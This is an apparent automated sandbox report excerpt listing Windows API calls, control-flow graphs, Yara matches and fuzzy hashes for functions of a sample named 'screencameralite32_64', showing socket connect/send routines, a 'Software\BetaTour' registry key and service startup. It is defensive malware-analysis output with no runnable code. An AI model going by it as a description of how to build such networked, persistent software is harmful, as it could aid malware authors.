                                                              • Opcode Fuzzy Hash: 88c023b1a9bf5c22916d209f714c7b005651ef70060765043ed236aa852811ee
                                                              • Instruction Fuzzy Hash: 04415BB1915301DFD720AF74C9447ABBBE9BF94358F10491EE89A87280EB74D544CB92

                                                              Control-flow Graph

                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 00402ED6
                                                                • Part of subcall function 00403FF4: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                • Part of subcall function 00403FF4: HeapDestroy.KERNEL32 ref: 00404044
                                                              • GetCommandLineA.KERNEL32 ref: 00402F24
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00402F4F
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402F72
                                                                • Part of subcall function 00402FCB: ExitProcess.KERNEL32 ref: 00402FE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                              • String ID: Y
                                                              • API String ID: 2057626494-4136946213
                                                              • Opcode ID: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                              • Instruction ID: ae24bdd31f92ba5c0019e7eb98566f973638ce5b9b082510a96f2684413349a7
                                                              • Opcode Fuzzy Hash: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                              • Instruction Fuzzy Hash: 3721A1B1840615ABDB14AFA6DE4AA6E7FB8EF44705F10413FF501B72D1DB384500CB58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1087 2c729ee-2c72a06 1088 2c72ab3-2c72abb call 2c80a50 1087->1088 1089 2c72a0c-2c72a10 1087->1089 1096 2c72abe-2c72ac6 1088->1096 1091 2c72a12-2c72a15 1089->1091 1092 2c72a39-2c72a4c WSASetLastError closesocket call 2c7a43c 1089->1092 1091->1092 1095 2c72a17-2c72a36 call 2c80a50 call 2c72f50 1091->1095 1097 2c72a51-2c72a55 1092->1097 1095->1092 1097->1088 1099 2c72a57-2c72a5f call 2c80a50 1097->1099 1105 2c72a61-2c72a67 1099->1105 1106 2c72a69-2c72a71 call 2c80a50 1099->1106 1105->1106 1107 2c72a7b-2c72aad ioctlsocket WSASetLastError closesocket call 2c7a43c 1105->1107 1111 2c72a73-2c72a79 1106->1111 1112 2c72aaf-2c72ab1 1106->1112 1107->1112 1111->1107 1111->1112 1112->1088 1112->1096
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72A3B
                                                              • closesocket.WS2_32 ref: 02C72A42
                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C72A89
                                                              • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02C72A97
                                                              • closesocket.WS2_32 ref: 02C72A9E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                              • String ID:
                                                              • API String ID: 1561005644-0
                                                              • Opcode ID: 6c4108875c6542d35192e82c3dd9b070e9d608d4c26cedde441cda0eca1e610a
                                                              • Instruction ID: e7bf3329ad18a244113c4992c698c5d1d9aca2f3c3c89ba5b4c5cddaff300704
                                                              • Opcode Fuzzy Hash: 6c4108875c6542d35192e82c3dd9b070e9d608d4c26cedde441cda0eca1e610a
                                                              • Instruction Fuzzy Hash: D4212BB1D50205EBDB20ABF88948B6EB7E9EF84325F104969EC05C3241EB70CA448B51
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C71BAC
                                                              • RtlEnterCriticalSection.NTDLL ref: 02C71BBC
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C71BEA
                                                              • RtlEnterCriticalSection.NTDLL ref: 02C71C13
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C71C56
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                              • String ID:
                                                              • API String ID: 1633115879-0
                                                              • Opcode ID: a3de9f77ec4a03a3ac98517879d0a5035cc7ca3c54be0cd86df6292e7b5b8611
                                                              • Instruction ID: a31823b7eac52614cf8f4312821d6977f1e067d3df63c9bf46a17b83760859da
                                                              • Opcode Fuzzy Hash: a3de9f77ec4a03a3ac98517879d0a5035cc7ca3c54be0cd86df6292e7b5b8611
                                                              • Instruction Fuzzy Hash: 7021AEB5A00604EFCB14CFA8C44879ABBB5FF88714F14858AEC5997301DBB5EA05CBE0
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72EEE
                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C72EFD
                                                              • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C72F0C
                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C72F36
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Socketsetsockopt
                                                              • String ID:
                                                              • API String ID: 2093263913-0
                                                              • Opcode ID: 3d852c628ee302f62731d22486b84e828b66f0ed9b796d1d7ea9b7ac5467ff33
                                                              • Instruction ID: 3bf3aa7459ad5ed4122c4c9856f8155310e7145e85c9c9cdaa4e7eb9140feab5
                                                              • Opcode Fuzzy Hash: 3d852c628ee302f62731d22486b84e828b66f0ed9b796d1d7ea9b7ac5467ff33
                                                              • Instruction Fuzzy Hash: AE01D471A61204FBDB209F65DC88F9ABBA9EB89721F008569F918CB181C77089048BB0
                                                              APIs
                                                                • Part of subcall function 02C72D39: WSASetLastError.WS2_32(00000000), ref: 02C72D47
                                                                • Part of subcall function 02C72D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02C72D5C
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72E6D
                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C72E83
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Sendselect
                                                              • String ID: 3'
                                                              • API String ID: 2958345159-280543908
                                                              • Opcode ID: 76e7e03db082e95cca9cbb662156aa1c058052252ba65a17ff35f3d5b8dda760
                                                              • Instruction ID: ede900985c5970a0b818dbd61c8477371e7009eaea80958ffc7974735aea1b3d
                                                              • Opcode Fuzzy Hash: 76e7e03db082e95cca9cbb662156aa1c058052252ba65a17ff35f3d5b8dda760
                                                              • Instruction Fuzzy Hash: FF31C0B0E00205EFDB10EFA0C849BEE7BAAAF44318F00855ADC0997280E7719695DFA1
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72AEA
                                                              • connect.WS2_32(?,?,?), ref: 02C72AF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID: 3'
                                                              • API String ID: 374722065-280543908
                                                              • Opcode ID: bfc47afb511df0c3acc93741f61f1cb65c876c806a05af334fda260ce36fe4a4
                                                              • Instruction ID: b6ca148cde49c05529dca1d79c53691aff77b6638246638d14a1bda40d967d8b
                                                              • Opcode Fuzzy Hash: bfc47afb511df0c3acc93741f61f1cb65c876c806a05af334fda260ce36fe4a4
                                                              • Instruction Fuzzy Hash: D9219671E00204EBDF14FFB5C448AEEBBBAEF84324F108599DC1997280EB7456059F91
                                                              APIs
                                                              • RegQueryValueExA.KERNELBASE ref: 0040D101
                                                              • RegCloseKey.KERNELBASE(?), ref: 0040D12B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Escape Division LIB 10.6.45
                                                              • API String ID: 3356406503-2105205552
                                                              • Opcode ID: c5f735510d7a8f5d962a633d6207791d2ad312bfea3c706ca057630aabfb0b2d
                                                              • Instruction ID: 4f4f907128f16d8d16b6efc6de27b9fd7ce808e357c3e0e1669b903ac9ada76d
                                                              • Opcode Fuzzy Hash: c5f735510d7a8f5d962a633d6207791d2ad312bfea3c706ca057630aabfb0b2d
                                                              • Instruction Fuzzy Hash: 4DE08C31E08402ABC7112FF10E0A97E2920AD86304721447BE512B20D2CBBC850E6AAF
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 7dc7d63773b695c28d22ceb06fc5fb98b88f0522117bad97dbcc4f997f56edd3
                                                              • Instruction ID: a3e922e6cf8adbc4f78d7fc1579113e831366bfb5e83fe738f50305cb4d5a2d4
                                                              • Opcode Fuzzy Hash: 7dc7d63773b695c28d22ceb06fc5fb98b88f0522117bad97dbcc4f997f56edd3
                                                              • Instruction Fuzzy Hash: 7B513CB1905256DFCB09DF68C545AAABBB1FF48320F14819EE8299B380D7749A10DFA1
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(?), ref: 02C736A7
                                                                • Part of subcall function 02C72420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C72432
                                                                • Part of subcall function 02C72420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C72445
                                                                • Part of subcall function 02C72420: RtlEnterCriticalSection.NTDLL(?), ref: 02C72454
                                                                • Part of subcall function 02C72420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C72469
                                                                • Part of subcall function 02C72420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C72470
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1601054111-0
                                                              • Opcode ID: 3172c28817182cf0002ca3849e065e7ab910e6fa014319476ae7012380e93dae
                                                              • Instruction ID: b36db633860a1509f57b067e8443ea4e4dcdd5520f5eaa15035f182e8232c7cc
                                                              • Opcode Fuzzy Hash: 3172c28817182cf0002ca3849e065e7ab910e6fa014319476ae7012380e93dae
                                                              • Instruction Fuzzy Hash: AE11E3B5100249ABDF218F14CD89FAA3BAAFF80754F108556FD56CB2D0CB34D960EB94
                                                              APIs
                                                              • __beginthreadex.LIBCMT ref: 02C82046
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02C7A8BC,00000000), ref: 02C82077
                                                              • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02C7A8BC,00000000), ref: 02C82085
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandleResumeThread__beginthreadex
                                                              • String ID:
                                                              • API String ID: 1685284544-0
                                                              • Opcode ID: 2a04e2b27b2f9658deda242443097cf3ec77fa0d15ffa095da6cb0e1b0a27336
                                                              • Instruction ID: e69e026682f674fb0f5fee37cd91ad17e3c23b9f70a54b7503b427bbcb915019
                                                              • Opcode Fuzzy Hash: 2a04e2b27b2f9658deda242443097cf3ec77fa0d15ffa095da6cb0e1b0a27336
                                                              • Instruction Fuzzy Hash: 2CF0C2702402006FE720AEACDC88F91B3E8AF89728F24456AF548D7280C771E892DAD0
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(02CA727C), ref: 02C71ABA
                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 02C71ACB
                                                              • InterlockedExchange.KERNEL32(02CA7280,00000000), ref: 02C71AD7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                              • String ID:
                                                              • API String ID: 1856147945-0
                                                              • Opcode ID: e29705010f8323dbb63ef53293439be31b1eda863cd2e7d7a578d6625684ff11
                                                              • Instruction ID: 77f7983c08ba2da1fbe9ed3c395827779a5d197ec82782a860193de35d9a3fc7
                                                              • Opcode Fuzzy Hash: e29705010f8323dbb63ef53293439be31b1eda863cd2e7d7a578d6625684ff11
                                                              • Instruction Fuzzy Hash: 85D05EB19E12049BE22066A0AD0FB7CF72CFB05725F000761FCAEC04C0EB51563886E6
                                                              APIs
                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\BetaTour), ref: 0040D707
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID: Software\BetaTour
                                                              • API String ID: 2289755597-3894993710
                                                              • Opcode ID: c264e548f686e0aed3b7130afa4879802013b5fc2fd2b5da53f1e6f78b2ec2c4
                                                              • Instruction ID: 47b733e969928d699b6bf36ce49eebfa405bea8b07761784142933fdc4f6e0bf
                                                              • Opcode Fuzzy Hash: c264e548f686e0aed3b7130afa4879802013b5fc2fd2b5da53f1e6f78b2ec2c4
                                                              • Instruction Fuzzy Hash: 0EF0A735E09080DBD7018BB4AF55FA177759305354F60817BD686771E3C178DC0ADA5E
                                                              APIs
                                                              • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D26E
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D81D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherLocalServiceStartTime
                                                              • String ID: /chk
                                                              • API String ID: 2521484715-3837807730
                                                              • Opcode ID: 481d0d6e1d6327ca5b89bf5283ae51a936b3e70da85819ed6e0b806d938ebde3
                                                              • Instruction ID: 7b9184c14441d537bebc76bd6eb1ea92ab33ca9d934219138a44e59205155f72
                                                              • Opcode Fuzzy Hash: 481d0d6e1d6327ca5b89bf5283ae51a936b3e70da85819ed6e0b806d938ebde3
                                                              • Instruction Fuzzy Hash: 2EE02638945209ABC6042BA1DF49AD53E665A12754780437FC0167BBF0C77B880F5A89
                                                              APIs
                                                              • RegCloseKey.KERNELBASE(?), ref: 0040D12B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: Escape Division LIB 10.6.45
                                                              • API String ID: 3535843008-2105205552
                                                              • Opcode ID: 02878723b2337266e3d53f9e3635a8cb09e6346dc43c63d5167c155de8f70d1b
                                                              • Instruction ID: 41f70d3fc98fa3777d312207ad59e05a081733e4cd327d2f32863c327406f800
                                                              • Opcode Fuzzy Hash: 02878723b2337266e3d53f9e3635a8cb09e6346dc43c63d5167c155de8f70d1b
                                                              • Instruction Fuzzy Hash: 8AC01231D09001A3C2113BE10E0BC7E25249D863093214077F511310D28ABD591E56FF
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C74BF2
                                                                • Part of subcall function 02C71BA7: __EH_prolog.LIBCMT ref: 02C71BAC
                                                                • Part of subcall function 02C71BA7: RtlEnterCriticalSection.NTDLL ref: 02C71BBC
                                                                • Part of subcall function 02C71BA7: RtlLeaveCriticalSection.NTDLL ref: 02C71BEA
                                                                • Part of subcall function 02C71BA7: RtlEnterCriticalSection.NTDLL ref: 02C71C13
                                                                • Part of subcall function 02C71BA7: RtlLeaveCriticalSection.NTDLL ref: 02C71C56
                                                                • Part of subcall function 02C7E02B: __EH_prolog.LIBCMT ref: 02C7E030
                                                                • Part of subcall function 02C7E02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C7E0AF
                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02C74CF2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                              • String ID:
                                                              • API String ID: 1927618982-0
                                                              • Opcode ID: 9e7199d46e364366163c08ae1e7b3b766a95f720ea1c37c31899eb93dd1a6bdf
                                                              • Instruction ID: f69828454ee9b1a53ac3bacf65655210c08b1fb9e798bbb0e45fe77760b32c22
                                                              • Opcode Fuzzy Hash: 9e7199d46e364366163c08ae1e7b3b766a95f720ea1c37c31899eb93dd1a6bdf
                                                              • Instruction Fuzzy Hash: 955136B1D04248DFDB15DFA8C884AEEBBB5BF58314F1481AAE905AB351DB309A04DF90
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72D47
                                                              • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02C72D5C
                                                                • Part of subcall function 02C7A43C: WSAGetLastError.WS2_32(00000000,?,?,02C72A51), ref: 02C7A44A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Send
                                                              • String ID:
                                                              • API String ID: 1282938840-0
                                                              • Opcode ID: ef5a314c3cae9c0032733d1fae6022b30615d2d1f05fb9363b88b5c87202c059
                                                              • Instruction ID: 0f4dea2e349422cf625313e93bd5ff84e713d11fe0e54bf8d592d98e8d046318
                                                              • Opcode Fuzzy Hash: ef5a314c3cae9c0032733d1fae6022b30615d2d1f05fb9363b88b5c87202c059
                                                              • Instruction Fuzzy Hash: A10184B5501205EFD7206F95C88486BBBFDFF85764B20452EFC9993200EB709D04DB62
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID:
                                                              • API String ID: 3494438863-0
                                                              • Opcode ID: af8e09d12e0a14235146bc7ce54132f35e250420bc832e9a58bbb5bf3773f33b
                                                              • Instruction ID: 263be8efa5ac1bf14bdee9fa0ba42e4f2f88fe54abbc8260e72fdbad644d8a5d
                                                              • Opcode Fuzzy Hash: af8e09d12e0a14235146bc7ce54132f35e250420bc832e9a58bbb5bf3773f33b
                                                              • Instruction Fuzzy Hash: 73F0AF71E95315AFF794AA69B8617B63795BB8033CB20863AF104DB284E3348850C744
                                                              APIs
                                                              • LoadLibraryExA.KERNELBASE(?), ref: 004021C3
                                                              • GetProcAddress.KERNEL32(?,?), ref: 0040D0E7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 2574300362-0
                                                              • Opcode ID: 39fcb641d693866b129298b72f71d5d09720e00a294521d593e3b91682caeaeb
                                                              • Instruction ID: ac62d261aab2db4835f2a2dd6304a7426ad0dabc45f1480c1e9501e5ccab87ef
                                                              • Opcode Fuzzy Hash: 39fcb641d693866b129298b72f71d5d09720e00a294521d593e3b91682caeaeb
                                                              • Instruction Fuzzy Hash: 7C01AF34A04306CFEB10CF64CD84BA53BA0FF01354F14807BED25AB2D5D778D91AAA5A
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C7833A
                                                              • shutdown.WS2_32(?,00000002), ref: 02C78343
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastshutdown
                                                              • String ID:
                                                              • API String ID: 1920494066-0
                                                              • Opcode ID: d5ec433b574a678a8468f94971a60c21242ecf972bbf554975487e0a2f11836c
                                                              • Instruction ID: 5a9eae2278d7b704e310907a9f0d31e385d66332a149bad06bbc6317a9e86dd2
                                                              • Opcode Fuzzy Hash: d5ec433b574a678a8468f94971a60c21242ecf972bbf554975487e0a2f11836c
                                                              • Instruction Fuzzy Hash: 60F05E71A45714CFD724AF6CD448B9AB7E5BF49320F008A1DEEA997380D731AC10DBA1
                                                              APIs
                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                • Part of subcall function 00403EAC: GetVersionExA.KERNEL32 ref: 00403ECB
                                                              • HeapDestroy.KERNEL32 ref: 00404044
                                                                • Part of subcall function 004043CB: HeapAlloc.KERNEL32(00000000,00000140,0040402D,000003F8), ref: 004043D8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                              • String ID:
                                                              • API String ID: 2507506473-0
                                                              • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                              • Instruction ID: b1684c5e0161eeb02f30399066ba6d75b4260e35b9d13e26dc8fbe5d47634710
                                                              • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                              • Instruction Fuzzy Hash: F5F092F0656301DAEB301B75AE46B3A39949BC0796F20443BF740F91E1EF7C8481960D
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7511E
                                                                • Part of subcall function 02C73D7E: htons.WS2_32(?), ref: 02C73DA2
                                                                • Part of subcall function 02C73D7E: htonl.WS2_32(00000000), ref: 02C73DB9
                                                                • Part of subcall function 02C73D7E: htonl.WS2_32(00000000), ref: 02C73DC0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: htonl$H_prologhtons
                                                              • String ID:
                                                              • API String ID: 4039807196-0
                                                              • Opcode ID: cc1b065d8f050f2c39ebd5cbc0c13fc7af8829386d4cbeeac287953e11abe800
                                                              • Instruction ID: 60c1e87b072652a458e2fc1758f7d168ec05d3450e1afd258f85d1f3f85bcaf4
                                                              • Opcode Fuzzy Hash: cc1b065d8f050f2c39ebd5cbc0c13fc7af8829386d4cbeeac287953e11abe800
                                                              • Instruction Fuzzy Hash: 1C8148B1D0424EDECF05DFA8D480AEEBBB9AF48314F10815BD854B7240EB365A45DFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002CAA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CAA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2caa000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 4d90580866feab809b8b6b743345478edbf02d09f7c2184557e618f7f0f727b0
                                                              • Instruction ID: 0c86527f268cfb6a1b734876f1f5a158dfe6f6b54520436c4d063646676b8232
                                                              • Opcode Fuzzy Hash: 4d90580866feab809b8b6b743345478edbf02d09f7c2184557e618f7f0f727b0
                                                              • Instruction Fuzzy Hash: 513158F150C600AFE312BE19DC857BABBE5EF98710F06882CD7C483B54EA3594508A87
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7E8F9
                                                                • Part of subcall function 02C71A01: TlsGetValue.KERNEL32 ref: 02C71A0A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologValue
                                                              • String ID:
                                                              • API String ID: 3700342317-0
                                                              • Opcode ID: 476411c07361dcbe13acd5891f76897770d6291fa60cd7cdd0feeb5508753478
                                                              • Instruction ID: 6594b24d9dace54c803f5e9fe134e8cb6dd26d8f8c14d5b8a075bcdec6169d7a
                                                              • Opcode Fuzzy Hash: 476411c07361dcbe13acd5891f76897770d6291fa60cd7cdd0feeb5508753478
                                                              • Instruction Fuzzy Hash: 0C2151B2D04209AFDB00DFA5D540AFEBBF9FF48314F14405EE919A7240D771AA00DBA1
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C733CC
                                                                • Part of subcall function 02C732AB: __EH_prolog.LIBCMT ref: 02C732B0
                                                                • Part of subcall function 02C732AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C732C3
                                                                • Part of subcall function 02C732AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C732EF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                              • String ID:
                                                              • API String ID: 1518410164-0
